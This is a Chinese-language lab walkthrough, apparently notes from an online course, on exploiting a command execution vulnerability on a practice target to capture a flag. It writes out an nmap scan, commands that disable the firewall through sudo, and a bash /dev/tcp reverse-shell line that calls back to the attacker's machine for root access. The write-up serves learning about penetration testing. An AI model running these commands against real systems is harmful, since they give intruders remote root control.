【网络安全0x0c】命令执行漏洞
51CTO的网课,本篇利用nmap搜索开放端口,nikto、dirb挖掘敏感目录找到命令测试界面,注入非法命令,执行反弹shell,得到root权限,获得flag。
本篇使用工具nmap,dirb,nikto,nc。
使用命令
反弹shell
1 | bash -i >& /dev/tcp/[ip]/[port] 0>&1 |
关于这条命令的详细解释与拓展,这里有两篇文章写的特别好:
另外一种方式:
1 | #开启python简易http服务器 |
渗透记录
- nmap扫描靶机IP地址开放端口,一个
8080
口的web服务,nikto
挖掘8080
端口web信息,找到一个测试界面:
1 | nmap -sV 192.168.1.121 |
- 打开测试界面,按照提示输入
ls -l /tmp
测试,可以看到有反馈信息:
- 扫描
/home/
扫出来了bill用户,查看一下bill用户目录,最下面的文件描述提示该用户可以sudo:
- 本地ssh登录bill用户,测试sudo命令:
1 | ssh bill@localhost sudo -l |
- sudo关闭防火墙,否则后面反弹shell穿不透墙:
1 | ssh bill@localhost sudo ufw disable |
- 反弹一个root权限的shell给攻击机:
1 | bash -i >& /dev/tcp/192.168.1.114/4444 0>&1 |
- 获取flag,不知道为啥shell里输入都double了,问题不大:
解决方法:
I’m guessing both terminals had stty echo, so you probably needed to Ctrl-Z
and stty -echo
on your local terminal and bg
to get back to the remote shell.